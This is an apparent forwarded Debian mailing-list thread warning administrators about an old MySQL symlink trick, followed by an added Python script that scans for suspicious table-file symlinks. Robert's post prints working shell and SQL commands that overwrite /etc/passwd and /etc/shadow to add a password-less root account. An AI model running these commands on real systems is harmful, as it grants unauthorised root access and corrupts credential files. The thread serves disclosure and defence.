Hello,

This one appeared on a Debian mailing list. I know that this is fixed in the latest versions as they allow running the server as non-root user and so it is not considered as a bug (....) but I'm sure that there are administrators out there who are not aware of this exploiting method!

bye,

-christian-

--
Christian Hammers    WESTEND GmbH - Aachen and Dueren         Tel 0241/701333-0
[EMAIL PROTECTED]    Internet & Security for Professionals    Fax 0241/911879
WESTEND is a CISCO Systems Partner - Premium Certified

Hi,

At first, an apology if this came by earlier, I accidentally removed quite some debian-* mail, and I don't know of a -private archive for developers.

As seen on some mailing list, can't remember which one:

    $ cd /var/tmp
    $ ln -s /etc/passwd gotcha.ISD
    $ ln -s /etc/shadow make_me_r00t.ISD
    $ mysql -u user -h localhost -p somepassword '../../tmp'
    create table gotcha(qqq varchar(255));
    create table make_me_r00t(qqq varchar(255));
    insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n');
    insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n');
    \q

Testing/unstable both have >=3.23-ish, stable has 3.22-ish. Testing/unstable are not vulnerable, I didn't have a stable box at hand to try. Anyone who has tried this on stable?

In my opinion, the whole idea of being able to specify an alternate database location to the mysql server is a problem, and I have never seen a real use for it (correct me if I'm wrong). I'm pondering on filing a bug against mysql-server for the whole alternate-location thing (bugs keep popping up with stuff ranging from these symlink tricks to stuff like 'select * from infile'-ish problems that allow reading from any file).

Greets,

Robert

--
Linux Generation
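
Added example (not part of the original posts, and not MySQL or Debian code): an audit helper that looks for the precondition described above, namely table-file symlinks in a world-writable directory that resolve outside the server's data directory. The function name, the data directory /var/lib/mysql and the suffixes other than .ISD are assumptions.

```python
import os

# .ISD is the suffix used in the post; the other ISAM/MyISAM table-file
# suffixes are included here as an assumption about what else to look for.
TABLE_SUFFIXES = (".isd", ".ism", ".frm", ".myd", ".myi")


def find_escaping_table_links(scan_dir, datadir):
    """Return sorted (link, resolved_target) pairs for symlinks under
    scan_dir that are named like table files and resolve outside datadir."""
    datadir = os.path.realpath(datadir)
    findings = []
    for root, dirs, files in os.walk(scan_dir, followlinks=False):
        # Symlinks to directories are listed in dirs, all others in files.
        for name in files + dirs:
            path = os.path.join(root, name)
            if not os.path.islink(path):
                continue
            if not name.lower().endswith(TABLE_SUFFIXES):
                continue
            # realpath also resolves dangling links as far as it can, so a
            # link to a file that does not exist yet is still reported.
            target = os.path.realpath(path)
            if os.path.commonpath([datadir, target]) != datadir:
                findings.append((path, target))
    return sorted(findings)


if __name__ == "__main__":
    # Assumed locations: adjust to the server's real datadir and tmp dirs.
    for scan in ("/var/tmp", "/tmp"):
        for link, target in find_escaping_table_links(scan, "/var/lib/mysql"):
            print(f"suspicious: {link} -> {target}")
    if os.geteuid() == 0:
        print("note: run the same scan as a cron job, and check that "
              "mysqld itself is not running as root")
```

Any hit deserves a look at who owns the link and at which user the server process runs as, since the post notes that running the server as a non-root user is what closes this hole.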